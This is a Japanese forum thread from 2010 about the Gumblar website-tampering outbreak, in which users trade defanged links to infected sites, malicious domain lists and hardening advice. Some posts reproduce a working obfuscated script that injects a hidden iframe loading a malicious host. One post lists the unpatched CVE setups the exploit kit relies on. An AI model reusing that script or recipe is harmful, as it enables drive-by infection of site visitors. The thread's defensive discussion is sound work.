悔しいビクンビクン!、このように完璧の防御を誇るITProの高性能サーバまでハッキングする
恐ろしいウィルスなのであ〜る!」とか書いとけばいいのに。
.ru:8080コレクション
ampsguide anycitytown authentictype burkewebservices carswebnet easylifedirect
freeprosports funwebmail guidebat genuinehollywood genuinecolors
halfsite homeproair homesaleplus lagworld saletradeonline suesite sugaryhome
superaguide superpropicks theatticsale theaworld thechocolateweb
thelaceweb themobilewindow themobisite viewhomesale webdesktopnet
webdirectbroker webnetenglish webnetloans webnetenglish whosaleonline
worldsouth worldwebworld yourtruemate
きりがないなw 俺も8080ポートをアク禁するだけにしようかな
>>515 のつづきってあるの?
そこに書いてあるアドレスに書いてあるの?
無関係?
知らないアドレスは踏みたくないんだけど続きがあるなら見たい。
無理して踏まなくていいですよ
>>536 GumblarChecker 2にかけたら、avastがプァーン
HTML:IFrame-GC [Trj]
>>536 <iframe name=c10 src='p://●net/.go/check.html' width=262 height=196 style='visibility:hidden'></iframe>
アスキーコード埋め込みでそのあとurlエンコードしたら上記が出てきた
誤検知っぽい
>>538 すまん、ドメイン検索するとウイルス配布サイトらしいな
gogo2me●net
540 :
536 :2010/01/24(日) 13:11:21
>>491 感染後に予防しても意味ないわ
風邪ひいた後にみかん食ったって治らないだろ
まっ、神経質になってるのは最初のうちだけだと思うけどね^^; インフルエンザの時もマスクしてたのは最初だけだったし^^; まっ基本的(手洗いうがい=最新のパッチ)なことは気にするようになったんじゃないの 無神経な奴は、何があったも気にしないから無理かも^^;
>>541 サクサク軽快〜♪ サクサク軽快〜♪ ウイルスバスター!!
販売本数No.1!! 選んだ貴方は・・・
パソコン\(^o^)/オワタ
ウイルスバスター(笑)が売れているのは日本ぐらいだろ・・・
NTTのやついれてるけど これはタダならまあいいよね カスペノートンアバストfセキュレ色々入れてウイルスかかったことなんかないからわからんけど
548 :
名無しさん@お腹いっぱい。 :2010/01/24(日) 16:07:00
kidsparlour●biz/ www●kidsparlour●net/ まだ対処してませんね
古いホームページだから放置するんじゃね
cometruestar.ru
551 :
名無しさん@お腹いっぱい。 :2010/01/24(日) 16:26:33
www●minami-aoyamama●info こんなとこもまだ
今朝VIPで騒いでいたやつ www●deeplove2●com/index_2.html
乙 だけど553と554のファイル内容一緒だ
どもです。 まあ見てもわけわからんのですが、一般人は現状の対策でおkってことでいいの?
おk
読んでわかったことは・・ ・古いIEだとヤヴァイ、ネット上にある任意のexeファイルを実行可能 ・IEはActiveXを実行しないようにしたらすべて回避可能 ([インターネットオプション]から[セキュリティ]タブの[インターネット]ゾーンのセキュリティレベルを[高]にするだけ) ・IE以外はJavaを切れば回避可能 ・Flashは使われてない
日々変化しているし1パターンだけじゃなかったはず 今回偶然使ってなかっただけだろうから 例えば他スレで使ってないと断言するのは危ないよ
どっちにしても
>>6 を行っておけば問題ないのは変わらない。
まあそうだがこれだけはいえる ”IEは使わない方が良い” コードの9割がActiveX依存、ActiveXを除けば残るのはJavaのみ
>>560 俺も読んでも分からない人なのだけど
> ・古いIEだとヤヴァイ
古いってIE6とかのバージョンっていう意味?
>>564 IE6はまだサポート期間内だからパッチが提供されてるのでアップデートをきちんとしていれば大丈夫、してないなら危険
IE5.5以前は危険
www●forms-inc●com/nicoletti/ よく分からないんだが、 ここ開こうとしたらNODに止められたんだけど、 ガンブラー感染してるって事?
/*Exception*/ 感染してる
>>568 そうなんだ。ガンブラー怖いな・・
回答thx
570 :
sage ◆sage/xLnlI :2010/01/24(日) 20:49:28
明日仮装pcで新しいコード拾ってこなくちゃ
こんどはどんなページに汁かな・・・
もちろん踏ませるのではなく本体を拾ったりしてもらうためにやっているのです
http://www16 。atpages。jp/filedl
ガンブラー置き場
たぶんこのアドレスまで安全、進むと危険
下げ忘れすまん
海外の串サイト調べてたらいきなりMSEがTrojan:JS/Agent.FA検出した これはGumblar・・・じゃないか
573 :
472 :2010/01/24(日) 21:26:11
>>474 そうスか…テンプレの対策はしてるけど、IEはなんかもう
使う気しなくなってもうた。「〜感染してみた」
の記事じっくり読んできたけどIE6がヤバイんですね。
Firefox+NoScriptでも迂闊に許可できないなぁと
575 :
名無しさん@お腹いっぱい。 :2010/01/24(日) 21:49:15
>>573 嫌になってmacmini買った
macだから安全ってことはないんだけどね
>>572 Trojan:JS/Agent.FAタイプのGumblarは知らないなあ
IE6使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう 8にバージョンアップしない自分が悪い
reefcheck●net NODが反応 JS/TrojanDownloader.Agent.NRL
www●oygas●com trueworldmedia●ru
580は /*LGPL*/ 581は /*Exception*/
>>579 2kの俺はどうなる
変えたくても変えられないんだぞ
2000ならFirefoxかOperaを使えばいいじゃないか。 IE6の使用は本当にIEじゃないと駄目なページにとどめるようにすればいい。
>Windows2000 DEPが使えないのが痛すぎ・・・
2行入れられてる psk3●sakura●ne●jp/iv35/ Exception trueworldmedia●ru dp44016550●lolipop●jp/seikatuhogo/ Exception cometruestar●ru
DEPをあえて無効にしているおいらに隙はなかった(´・ω・) ス
>>583 2K使ってて感染した人にはセキュリティソフト関係なしに自己責任だろう
XPやVISTA、7にバージョンアップしない自分が悪い
企業ほどIE6にこだわって入れたままにしてるとこ多いよね。 理由を聞くとセキュリティの都合で〜とか言う。
>>584 普段使いは火狐だから大丈夫だと思ってたら、appleのソフトはバージョンアップ時に
強制的にIE立ち上げやがったぞ。
「IEは普段使いじゃないけど普段使いにする?」の画面が出てきて、止められなかった。
appleはIEでも火狐でも許可サイトには入れてなかったのに。
ここから本題。
慌ててIEは最高レベルにしたけど、立ち上げた瞬間に突く脆弱性って、コード実行能力
皆無のIEでもやられる?それとも大丈夫?
これが大丈夫でないなら、IEが完全削除できないWINでは、ゼロデイ突かれたら
終わりってことになる。
からめる って何
>>583 うちも2kだけど、2k用のIE6の修正パッチがms updateで配布されてるぞ適応したら?
カラメルのおっちゃ〜ん
>>583 2000でIE6でも22日のパッチを当てておけば現状ゼロディなんてないだろ。
Silverlightは2000だとWindows Updateには来ないみたいだからSilverlight公式に行かないと
アップデートできないけど。
というかさ、立ち上げた瞬間に突かれる脆弱性って具体的には何よ?
そんなもの見たことも聞いたこともないんだけど。
>>593 プリンの底にある黒い奴のこと。
>>598 乙です
ダウン開始直後いきなり反応して接続切られた・・・
DEPは向こうにしちゃ駄目なんじゃあ…
sleipnirとIEって互換性あるらしいけど、IEを最新版にしてsleipnirも更新しとけば大丈夫?
>>587 さくら
ろりぽ
でじろにめる逝かなかったみたい…
いや、中身はIEだし
>>603 大丈夫
プニルの開発もIEは最新にしてくれってアナウンスしてた
>>606 それならよかった
今IE6から8にアップデートしたとこだ
そしたらjavaがねぇぞゴルァって言われた
IE8にしてスレイプニル使ってるわ 感染はしたことない スクリプトは切ってる
609 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 00:20:36
IE7で改竄サイトにアクセスしたらJAVAもうごいたみたい。
>>597 ルーターがなかったらやられるんじゃないの、立ち上げた瞬間に。
>>611 自分は切ってるよ
絵茶の時は絵茶専用に別のブラウザ立ち上げてる
絵茶のサイトが感染したら・・・なんと恐ろしい・・・
もしもニコニコのランキングページが感染したら…パンデミックにも程がある
>>610 なるほど、ルーターなしの環境なあ。それは想定していなかったわ。
ニコニコもそうだけど、大手の2chコピペサイトが改ざんされたら被害がすごいだろうな。
スクリプトブロックすると動画サイトとかまったく機能しなくなるからなぁ・・・・ 信頼してるサイトが感染したらと思うと背筋が寒いぜ
2ちゃんねるが! 改竄されたら!
M$が! 改竄されたら!
リネージュ公式が! ハンゲー公式が! 官公庁のサイトが! きりがないな
自分でWhiteListに入れてるところが改竄されたらと重うと
623 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 00:53:08
ルータつけてなくて
>>7 もやってないと実際どんな被害があるの?
ウイルス仕込まれたりデータごっそり流出?
>>621 ネトゲの公式はどっかやられたことあったよ
懐かしいな、それ
どうせ無防備PCの記事だろ・・と思ってクリックしたら予想通りだった
ホワイトリストに登録するような中途半端なことするなら、全許可でも同じだと思うけどなあ。
javaを有効にするの欄もクリアにしておいたほうがいいのかな?
630 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 01:14:06
>>590 企業ではIE6のところが多いんじゃないかな。
とくに自社開発システムを使う大企業。
IE6はセキュリティの関係で使わざる得ない。7以上にするとセキュリティが高すぎて
業務システムが動かない。
>>515 JREって保護モード対応してるから、Vista/7でIEを保護モード下で動かしてると、
JREの脆弱性を突かれてもシステムには影響ないんだよな
JREバグの検証コードで実験したけど、保護モードで動かしたときは大丈夫だった
>>588 不具合の出る特定ソフトは
DEPの例外に登録すればいい気がするが・・・?
>>575 普及率が高いものはターゲットになるから、普及率がひくけりゃ低いほど狙われにくい
だから、NetBSDとかOpenBSDとかだれも使ってないOSが安全
DEPって標準では重要なシステムファイルのみってなってなかった? おれは設定変更してすべてのプログラムで有効にしてる
>>629 きちんとアップデートしておけば発動することはないんだから有効のままでいい。
たとえ発動しなくても引っかかること自体が嫌なら無効にすればいい。
デフォがセキュアでも ユーザーは穴開けまくる
>>555 乙!
> Outlook Expressのメールすべてを…url…に送信する
そこんとこは「CVE-2008-2463」だお
SnapShot Viewerの SnapshotPath と CompressedPath と PrintSnapshotを
ごにょごにょすると、…url…が実行できちゃうみたいね
ついでだから感染したい人向けの環境書いとくよ
・MDAC(CVE-2006-0003)
SP3より前のWindows XPで2006年4月の月例パッチを未適用に
・SnapShot Viewer(CVE-2008-2463)
2008年8月の月例パッチ未適用の古いSnapShot Viewerをインストール
・Microsoft Video ActiveX Control(CVE-2008-0015)
2009年7月のパッチ未適用のDirectShow(Windows)をインストール(デフォルト入ってる?)
・Adobe Reader
8.1.2以下のVer.8→util.printf(CVE2008-2992)コース
9.2.0にしる→newPlayer(CVE-2009-4324)コース
7.1.0より前のVer.7→Collab.collectEmailInfo(CVE-2007-5659)コース
Acrobat Script(ReaderのJavaScriptな)でバージョン分けしてるから、
この3パターンのどれかしかだめだお
・JRE(CVE-2008-5353)
6 Update 11より前、5.0 Update 17より前 、1.4.2_19より前のJREのどれか
DEPの有効化やスクリプト無効化は禁止ね
うまく組み合わせないと好みの攻撃が受けられないから注意してね
感染チャンスは1日1回、IP変えないとはじかれちゃうぞ
ほかに足りないものある > all
GPLとLGPLとExceptionでPegel
>>621 GENOの時には官公庁かなりやられたよ。
ライブカメラ持ちの国交省出先のは、一ヶ月前に見てたからぞっとした。
8080になってからはどうだったか忘れた。
陥落したらまずいサイトってのは日本じゃ何をおいてもYahoo! JAPANトップだわな。 恐らく日本語サイトでは1日あたりのページビューが最も多いページ。 あそこがやられると、被害は「甚大」の一言で言い表せるものではなくなるだろう。 Yahoo! JAPANのセキュ担当、頼んだぞ!
>>637 みたく改めてリスト化されると、ここまで落とさないと感染できない事実に驚くわ。
ここまで落とさなくとも感染はするぞw
なんなの感染したい人向けって 気持ち悪(´・∀・`) MじゃなくてGだね(^Д^)
645 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 03:14:05
W7cw9590 = 'i^@c($)i!o(^-(u^(#!s@.)!!d#a^^u^(&&m&^!#.$#&$(n!!&e^)$$&t(&.!@&!o!c$n^!-&n#(e##-(#!#j!&$!p#@).!(c)^$!o#!^m(e@@&t)r()#u)&^e@s!^)t#()a#r!)^^.@r&u#'.replace(/\!|\$|&|#|\)|@|\(|\^/ig, '');
O1waipyz = document.createElement('if'+'rame');
O1waipyz.style.visibility = 'h!(#i^?d^@@d^^&e&^((n&)#'.replace(/\(|\$|#|&|@|\^|\)|\!/ig, '');
O1waipyz.src = '
http:// '+W7cw9590+':8080/index.php?sc';
document.body.appendChild(O1waipyz);
646 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 03:15:02
直リンするなよ
ζ / ̄ ̄ ̄ ̄\ / \ /\ \ / | ||||||| (・) (・) | (6-------◯⌒つ | < バカモ〜ン! また直リンしおって! | _||||||||| | \ / \_/ / \____/
ガンブラーの目的は、ボットの分散ネットワークを作って何がしたいの?
651 :
650 :2010/01/25(月) 04:31:21
すまん、誤爆した
日々新しい亜種が生まれてるのはわかるけど、このスレで既出の奴に感染していないかを調べるにはどうすればいい?
>>653 の補足:訪れるサイトではなく自分のパソコンの感染
まずセーフモードで起動します。
次に服を脱ぎます。
そして呪文を唱えます。
ふぁっく!おまいらそういうのばっかだな!
659 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 09:29:38
>>7 の
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
スタートアップの種類が、自動のまま動かせないのですが。
その下のRemote Procedure Call(RPC)Locatorは変えられます。
こちらを切っておけばよいのでしょうか?
くっ!ガッツが足りない!
>>630 そんな"セキュリティにこだわった"環境で、"ネットサーフィン"すんなよ、って話。
>463 管理人にメール出した後も変化無しだったんで, 今朝AAA!CAFEに連絡したら,やっと改竄箇所が削除されてました。 トップページで告知してくれたらいいんだけど。
>>567 連絡してやったら、Web製作費がリーズナブルだったから発注したそうだ
「お知らせ下さってありがとうございます お礼に家具をお安くいたします」とのことだったw
金曜日に感染しました。 やたら、TM6.tmpだの、TM1A.tmpだの 通信をしたいとFWのポップアップがでるから おかしいと思ってたら・・・。 TM6.tmp類の削除とレジストリからも消したのだが、 siszyd32.exeが見つからない。 と思ってたら、wwwpos32.exe でした。 FFFTPに何個か設定があったのですが、 今のところWebの改竄は確認できてません。、 TM6.tmpの通信をブロックしてたので、 情報は漏れなかったのかも?
…と楽観視していてやられたサイトは沢山あるんじゃね。 htmlだけ見てたらjsやられてたとか単純に後回しにされてるとか。
>>480 いまは感染サイトは閉鎖されて、ブログ書き変わっているんだけど、
> 現在、
> 「カーポスト」「横浜陸事の代書屋」のホームページを
> 閉鎖しております。
> また、対策方法として下記の手続きを施します。
> 当事務所ホームページにより感染してしまわれた方には
> 大変ご迷惑をおかけいたしまして誠に申し訳ございません。
> FTPソフトを利用なさらない方には実害はないかも
> しれませんが、対応方法等を記載致します。
実害ないんだっけ???
>>663 基本的な対策をしていればRequestPolicyなんて不要だろ。
そもそもログが不要ならRequestPolicyと同じことはFirefoxの本体機能だけで可能。
>>669 マジで。今日いじったばっかりだったよ。
素人判断で迂闊に手出しちゃ駄目だなぁ。
RequestPolicyはガチガチにすると閲覧するときレイアウトくずすからなー それにもっさり重くなるし
>>672 再起動後に症状が出るはずだから、今のうちに必要な部分はテキスト保存しておけ
セキュリティソフトも立ちあがれなくなり、最悪ネットに接続することすらやばくなる
>>7 コピペは次スレからどう扱うべきかね
最悪OSリカバリーでも泣かない!超自己責任でやりたきゃやれ! とかテンプレの頭とケツに行間空けて書いておくとか
>>670 > 293 :名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:43
> 手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
> 全部IPが引けなくなってしまった
GNU GLP/LGPLのドメインが一掃されたみたいだから
21日までビンゴ、22日から実害なし…かな
>>675 >>7 は統合セキュリティソフトやFirewallで閉じてるだろうから「いらない」に一票
正直セキュリティソフトも入れてないやつまで面倒見切れん
>>679 チェッカーじゃかからんがaguseでいったらTrojan.JS.Redirector.arだとさ
tcupの掲示板のいたるところで Trojan.JS.Redirector.arって出るんだが これカスペの誤検出なのかな?
682 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 15:35:14
Trojan.JS.Redirector.arが検出されました
>>235 のサイト踏んじゃったんだけど…
オンラインスキャンで反応でなければセーフでしょうか
もうどんなサイトも掲示板も安心できないこんな世の中じゃ
ポイズン
wikiwiki.jp感染してる?
RRASってホームエディションは使えないんだっけ?
>>681 aguseでいくとでるね
これなんだろう
したらばなんてトップページでTrojan.JS.Redirector.ar出るし
これ、アフィリエイトとか広告を誤検出してんじゃねぇの?
ν速にスレ立ってるなw
あちこち移動する度に「Trojan.JS.Redirector.ar」発見してカスペルスキーが怒るw 昨晩まで普通に見れたサイトばかりなんだが…
なんか一気に感染広がってる感じがするなあ
カスペ(笑)なら誤検出だろ あそこゴミじゃんwwww
GoogleのAdSenseに反応してるみたいだが
tp://pagead2.googlesyndication●com/pagead/show_ads.js ↑これじゃねぇの?って噂もあるみたいだけど (こんなんその辺のサイトに埋め込まれまくりやん) 気力のある人はスクリプトを解析してみそwオレはごめんだがw
カスペだとひっかかるこれを誰かウィルストータルに送ってくれ
http://pagead2 ●googlesyndication●com/pagead/show_ads●js
googlesyndicationに反応してるのかね 誤検出ぽいなこれ
カスペ以外では何の問題もないんだから気にする必要はないな
>>698 これを誤検出しているようじゃ行く先々でアラートの嵐だろうな。
>>698-699 俺もそれだ。どう考えても誤検出だよなやっぱ
いちいち警告音鳴るのが凄く嫌だw
>>698 これをトロイって検出してるな
したらば掲示板を初めそこらじゅうで検出されてうざくてたまらん
グゥュエイイアアアアアアア!!!! この音怖すぎ
カスペなんて使ってるからこうなるんだ 大人しくZEROとか使ってれば大丈夫
またカスペか・・・
>>709 カスペよりZEROの方が優秀ってのは皆知ってます
カスペルスカイって誤検出ばかりだな
この30分で「Trojan.JS.Redirector.ar」のGoogleでのヒット数が0から10まで増えた 急上昇ワードの26位になってるw
>>712 俺がググった時はこのスレがトップに出てきたわw
「Trojan.JS.Redirector.arって警告が出るぞ!」
「カスペがTrojan.JS.Redirector.ar検出してうるさいんだが」
「Trojan.JS.Redirector.arって何だ?」
「ググってみようぜ!」
「お、早速情報出てきた出てきた」
「…ってこれ俺達だし!!」
さすがネラー こういった情報だけは異様にはやいな
カスユーザーざまぁ
吹いたw
カスペの検出は正しかったみたい
>>718 冗談だろwww
俺のは全く反応してないぞww
誤検出じゃなかったらGumblarの比ではないくらい広まってることになるなw
どう考えても誤検出です。
誤検出でなければググル先生がウンコ漏らすレベル
誤検出じゃなけりゃ大惨事だなw
>>718 カカスペの誤検知じゃないの?
ググって見るサイトのあっちこっちで、トトロイ続出なんだけど
トトロイって何か可愛げやのうw
カスペはこれだから駄目なんだよな
グーグルアドセンスか何かのjsに反応してるから あちこちのサイトで検出されてるんだろ。 誤検出じゃなかったらスゲーとは思うんだが、 いちいちうるさくて困る。
ハ,,..,,ハ /;;・ω・;;ヽ . (;( ^^^ );) `'ー---‐´ トトロイ (2010〜)
仕事早いよw
>>659 Remote Procedure Call とめたらOSさえ起動しなくなったり、
OS起動にめっちゃ時間がかかったり、ほとんどのアプリが動かなくなったりするよ
WindowsNTとかでは止めれたんだけど、止めて動かなくなるバカが増えたのか
いつのまにか標準UIからは止められなくなった
トロイの検出ダイアログが一件に付き2つ出ることを表してるんじゃないの? ダダイヤログって書くべきだったか。
俺もトトロイ検出しねえかな
トトロイはエロ動画を主食とします
googleの広告を誤検知かよ
カスペ「googleはトロイ」
google先生のshow_ads.jsは誤検知だな 本当にgoogle先生がやらかしたら世界中大騒ぎだわ ふだんadblockで広告とめてるから警告さえでなかった
741 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 17:11:33
>>669 ありがとうございます。
ポート番号「445」をいじったらオンラインにつながれなくなり
ばたばたしていてレスが遅れて申し訳ありません。
tp://soudan1●biglobe●ne●jp/qa3068747.html
ここからトロイ検出が出て少しびっくりしてしまいましたが、
誤検出?のようですね。
地球\(^o^)/オワタ
googleアドセンス使ってるサイト全部ウイルス扱いかよw カスペさん本気出したな
トトロイの鳴き声は凶悪だなぁ
グーグル先生を敵に回すと大変なことになっちまう
怒ってグーグルが無料のアンチウイルスソフト作ったらおもろいんだが。
google先生も難読化してるのか
google先生のjsも、javascript使ってリダイレクトしてるから、 JS redirectorにはかわらないな
これでGoogleの検索結果からカスペ関連のサイトが消えたら面白いんだがなw
google vs カスペ 最終決戦がはじまる
よりによってgoogle先生にケンカを売るとは・・・
google vs カスペとか決戦にならねえだろ
Googleとカスペルスキー \\ == \ __ _┌┐ [ [_二二_\_/./∠勹ヽ ロロロ\| |. ̄.「 ̄l\[ ̄|\ | .| - ┌‐─‐┤∠ ∠几 _ .「= | = | [ 勹..| l | .| | | .| ‐ │匸 ̄ |フ / = 」|. |.|E= .|.=.」 | 勹.| レ、 | .| | 「 「 ‐ │×′く[,..、|フ = ∠|ノノ 匸 __コ/ [´ |__/. |__」 | レィ ̄凵 L/\\| .| .λ |、_,,/| 凵 [_∧__/ 、__/\_/ . \_イ__∧_二二二λ二/ ¨\_,.‐‐‐^-‐′
>>741 そっちかよw
もう
>>7 は次スレから不要に一票
手練は最初からわかって対処しているだろうし、下手に注釈つけても素人相手じゃどうしようもないわ
まさにがっぷり四つ!
ぐぐるあどはってる有名サイトどこ
利用者にことわりもなしに無断で広告表示するジャバスクリプトなんてウイルスとかわらんだろ Googleアドセンスはウイルス扱いでいいよ
RPC止めるなんて危険なことしないでRRASでいいんじゃん?
ハ,,..,,ハ /;;・ω・;;ヽ . (;( ^^^ );) `'ー---‐´ _,,_ ∩ (^Д^)/ ⊂ ノ とったどー (つ ノ (ノ
「Trojan.JS.Redirector.ar」でググると、もう142件もヒットするようにw 急上昇ワードでも15位に上がりました
カスペのGoogleアドセンスは全部誤検出でしょ?
カスペって更新テストやってからファイル配信してないんじゃねーの? こんなもんテストやってればすぐ気付くレベルだろ〜?
モフモフしそうだぎゃ
× GENO ○ Gumblar
ト、ト、トレンドマイクロのつ、つぎは カ、カカ、カスペ・・・な、なんだなぁ〜 ぼぼぼ、ぼクはおむすび欲(ry+AA略
また火狐野朗がなんかいっちゃってんのか
>>772 またGENOか!
今ウイルスが蔓延したのはそいつらのせいといってもいいのに
あいつら全然反省してないんだな
もう業務停止命令出せや
そのりくつは おかしい
RequestPolicyを押してるけど 外部ドメインじゃなきゃ安全とかよくいえるな FTPのっとられてればなんでもできるっての
>>736 このへんないきものは こっそりあなたのPCにいるのです。たぶん。
衆議院議員トトロイ www●kishida●gr●jp /*Exception*/ 関係無いけどGoLiveのゴミソース <csscriptdict import> <script type="text/javascript" src="file:///C:/Documents and Settings/ukkiy/Application Data/Adobe/Adobe GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js"></script> </csscriptdict> ukkiy逃げて〜
>>782 メールで対処お願いしました
とりあえずはトップページだけみたいですね
されとったな
>>666 家具が安くなるのはいいんだけど
まだ直ってないのね,そこ
>>787 魚拓ページまでなら大丈夫
それ以上は感染対策してから池
最近よくGoogle先生喧嘩売られるね
カスペ早く更新来てくれ ギャーギャーうるせぇ
tp://www●m-on●jp/でカスペがオブジェクト
tp://pagead2●googlesyndication●com/pagead/show_ads.js//show_adsから
Trojan.JS.Redirector.arを検出するんだが
>>698-699 の通り誤検出ってことでいいのかな
誤検出だからもうその話は終われ 23時頃修正くるらしいし
====以下誤検出スレ====
まだ誤検出と決まったわけではない!
799 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 23:38:30
IEでセキュリティレベルを高にするとjavaが無効になる分、動画サイトが見れなくなっちゃうんだけど 特定のアドレスを指定して、そのページだけjavaが有効になるっていう設定ってできる? たとえば、いつもはセキュリティレベル高だけど、ようつべだけはセキュリティレベル中(java有効)になるとか 毎回レベルを指定するのが面倒だ
火狐とかならお気にいりに入れてるサイトごとにセキュリティ設定出来るよ
サイト登録すれば言いだけ 火狐野朗の自演か
IEでもな
>>800 インターネットオプションのセキュリティで
信頼済みサイトに登録すればいける。
でも火狐やプニルの方が楽といえば楽かな。
IEの良いところ : Firefoxをダウンロードできる
javaいれてなくてIEでセキュリティ高にしてあっても動画サイト見れるんだけど これってなんか設定間違ってるってこと?
また糞狐が変なこと言い出したのか さすがテンプレでnoscriptだか宣伝するだけあるな
>>808 した。だが見れない
つべ以外の動画サイトも登録してはみたが、新しいjavaを入れろと表示されるだけ
もちろん、javaは最新版にしてあるし、セキュリティレベルを中に設定すれば問題なく見れる
youtubeにjavaなんか使ってるか javascriptのこといってるのか
節子、それjavascriptやない
IE系だと、javascriptとActiveXだろうと
あなたチューブ
>>807 js(ジャバスクリプト)とActiveXの実行許可した?
jsとJAVAは全くの別物で、ようつべはJAVA多分関係ないよw
>>812 ようつべが見れました。ありがとう
しかし、相変わらず別の動画サイトは見れないorz
>>817 こんな程度で躓いているならあなたには無理。
現在感染していなくて
>>6 の対策がきちんとできているならそのままでいいよ。
現状で
>>6 以上の対策は掛け捨て確実な保険というか、自己満足や趣味の領域だから。
819 :
名無しさん@お腹いっぱい。 :2010/01/26(火) 03:39:06
IEは8?
釣り乙
2kか9xかどっちかか?
IE5ってOS9ですか?
誤爆スマソ
ヤフーのブリーフケースからファイルを取り出そうとしたら ノートンがTrojan.Malscript!htmlで反応したんだけど 感染してんのかな?それとも誤検?
ノートンのサポートに訊けよ
誤爆ってレベルじゃねーぞ
激安通販アラジン(/*Exception*/) tp://toratomo●lovepop●jp/index/ さゆりちゃんの電気屋さん(/*Exception*/) tp://electronics●sayurichan●com/ スニーカー通販(/*Exception*/) momo-cafe●sunnyday●jp トップページは403だが、該当ページにアクセス可能 /folder/sneaker ※ろりぽは事の重大さがわかってないらしい 調査に戻る..
truelifefamily.ru
ロリポとさくら大杉 というよりはロリポとさくらで調べて行ってるんだろうけどさ。 つーかロリポGMOだろ? 同じGMOのアイルでは「ガンブラー点検無償実施」とかやってるのに つーかGMO自体がWebAlertってのやってんのに やっぱ安物サーバーはこういう時にダメなんかねぇ。
ユーザー層がアレだからだと思ってたw
ExplorerにFTPのパス覚えさせてるような初心者が多いんだろう
>>834 上:ろりぽにつーほー
中:403
下:そこも403になってました。
γ⌒ヽ < ・、,,,;;,) ハ,,..,,ハ < つ=つ /;;・ω・;;ヽ ノ ノ三) (;( ^^^ );) ∠、 m)=m).. `'ー---‐´ ガンブラー トトロイ (2009 〜 ) (2010 〜 )
kawaii
842 :
名無しさん@お腹いっぱい。 :2010/01/26(火) 20:42:52
ハッカーってどうしてマウス使わないの?
>>782 他人に迷惑かけておいてスクロールしなければ見えないところに告知してんなよ。
自分のことしか考えていないクソ政治家が露呈しているわ。
まぁ通知すらしない企業だってあるんだし
嫌な言い方
>>847 whoisからべーすぼーるまがじんにめるしますた。
852 :
名無しさん@お腹いっぱい。 :2010/01/27(水) 01:18:54
わざと感染して、いろんなところにFTPアクセスすれば Gumblarも混乱するんじゃ?
GENOみたいにweb改竄で感染させて ハードディスクフォーマットさせるウイルスってあるの?
糞チェッカーは糞
>>859 サイトリニューアル
> 年末年始にかけて2週間のサイト閉鎖を行い、さらに、1月22日から25日まで、
> 部分的にページが見られなくなっておりましたこと、深くお詫びいたします。
> その後システムの調査をしましたところ、会員情報に関しては、漏洩の事実
> が認められなかったことを、ここにご報告させていただきます。
ウイルス感染問題はウヤムヤ
>>857 コメントにSo-netセキュリティ通信のURLでも書いておこうかと思ったけど
>お互いに「アナログ人間万歳☆」ですね?!
これみて萎えた。
864 :
名無しさん@お腹いっぱい。 :2010/01/27(水) 10:02:22
865 :
856 :2010/01/27(水) 14:25:59
>>865 そのブログにコメント出してたら消されてるなw
T-fal(ティファール)ウェブサイトご利用のみなさまへ
いつもT-falのウェブサイトをご利用くださいましてありがとうございます。
現在サイト内において、ページによって表示されにくい個所がございます。
ただ今改善の作業を進めておりますが、完全な復旧まで今しばらくお待ち
いただけます様、よろしくお願い申し上げます。
株式会社 グループセブ ジャパン
http://www.t-fal.co.jp/ ここのサイトも感染したのかな?
>※みんな頭カラッポ=略して「みんカラ」 ワロタ オカルトグッズが蔓延するサイトだからなぁ・・・
ソースに記載のある /krups/js/xtplugar.js /krups/js/xtplug.js が404になってる。改ざんされて消したのかもね。
BLOGって感染しないよね
872 :
名無しさん@お腹いっぱい。 :2010/01/27(水) 16:47:47
ティファールは前にも改ざんされたからね
>>871 SQLインジェクション
あ、トレンドマイクロ的な意味じゃなくて
これはひどい(アフィ的な意味で) symantecgam.seesaa.net
875 :
人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 17:31:35
WindowsXP Windows98 Ubuntu 9.10 どれがいいんだろう
ttp://www ●mv-tokai●com/
nortonのアドオンが検出
これは改竄ですかね?(もしくは過去に改竄されていた?)
878 :
人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 17:37:53
>>876 持ってない
よし、Windows98(アンチウイルスソフトなし)で踏んでこよう
>>877 ざっと見た限りでは、少なくとも今は改竄は無いっぽい
キャッシュ見て来ます
1月12日に「お詫びとお知らせ」pdfファイルがあった スナック菓子に針1本混入だった
881 :
877 :2010/01/27(水) 17:44:50
malscript扱いになってるけどキャッシュのどこかに反応したっぽい トップページでは出ないっす
882 :
879 :2010/01/27(水) 17:52:30
GoogleとBingのキャッシュ見たけどよく分からんかった どこにひっかかってるんだろう…aguseでも反応無いけど
>>882 今確認してみたらyahooのキャッシュでTrojan.Malscript!htmlと出ました
あれ・・これは ページ関係なしにyahoofs.jp(yahooのキャッシュ)自体が反応しているみたいだけど これはnortonの駄目機能の誤爆かな 吊ってこようorz
カスペがGoogleに喧嘩売ったと思ったら 今度はノートンがYahoo!に喧嘩売ったのかw
カスペは即日修正したがノートンは違うな
まぁ24時間は様子見ようぜ。 あっちのYahoo!とYahoo!Japanとでスクリプト等が異なると対応は遅くなるだろうな。
889 :
人柱になりたい人 ◆sage/xLnlI :2010/01/27(水) 18:16:53
ノートンのネーミングは相当アバウトっつーか広範囲すぎるので それでググってもあまり意味ないぞ
>>884 なに?よく分からないけどヤフーのトップページ見ただけでもノートン反応するって事?
俺のNIS2009は何も反応しないけど
>>892 反応するのはyahooのキャッシュ鯖
検索したページをキャッシュ表示すると出る
>>893 ありがとう、何も反応しないや、おかしいな
>>895 NIS2010は2009のマイナーバージョンアップに見えて全くの別物仕様だからね
ただ現状の最新エンジンには環境依存の不具合があってうざい事この上ない
>>894 これだけ感染を繰り返すのは更新に使用しているパソコンからウィルス駆除してないんじゃないのか。あとサーバレンタル元に連絡して一時閉鎖とかの対応取って貰うとかしないと駆除と感染のいたちごっこが続きそう
